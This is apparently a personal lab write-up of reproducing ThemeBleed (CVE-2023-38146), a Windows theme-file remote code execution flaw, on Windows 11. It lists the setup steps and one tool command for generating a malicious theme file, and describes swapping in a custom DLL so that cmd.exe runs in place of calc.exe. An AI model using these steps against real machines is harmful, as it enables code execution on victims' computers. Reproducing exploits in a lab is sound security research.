Themebleed exploit
init
Lets try to exploit the yet-another-windows-vulnerability known as CVE-2023-38146 aka ThemeBleed. To do that we need to create the theme file which will consist of “path” from where the payloads will be delivered.
Please note that as per my testing, the command execution only happens if both the SMB server and the theme file is in the same machine. Pulling dll
(s) from remote system appears not to work.
In the attacker machine, you will need to disable the SMB
by disabling the Server
service from the services.msc
. Keep that service in disabled state.
Download the repo and use the below command the generate the theme file:
.\ThemeBleed.exe make_theme localhost exp.theme
After generating you will have to run the code in server mode.
Now lets run the exp.theme
file to the victim machine (windows 11) and run the exploit.
As we can see that the Calc.exe
has been executed.
privilege ?
Windows permission systems is a mystical cloud generated by the Genie of Aladdin. So there is no way of telling what kind of permissions the calc.exe
will have rather lets try to doe something else. From the Process Explorer
we can see the following information.
As this is no fun, we will try to execute our command which is cmd.exe
by modifying the dll
file which are provided when the exploit has executed.
Now I have created my own dll
and and instead of running calc.exe
I tried to run the cmd.exe
. After couple of tires I was able to run the calc.exe
and a message box showing a prompt. In the below screenshot you also will be able to view the permission level of the cmd.exe
process running in.
future works
Currently I was not able to deliver the payload from a remote system and planning to check why my dll
works when running from localhost but not when it is running from the remote system. The authors original dll
however works both in localhost as well as in remote systems.
reference
https://github.com/gabe-k/themebleed https://exploits.forsale/themebleed/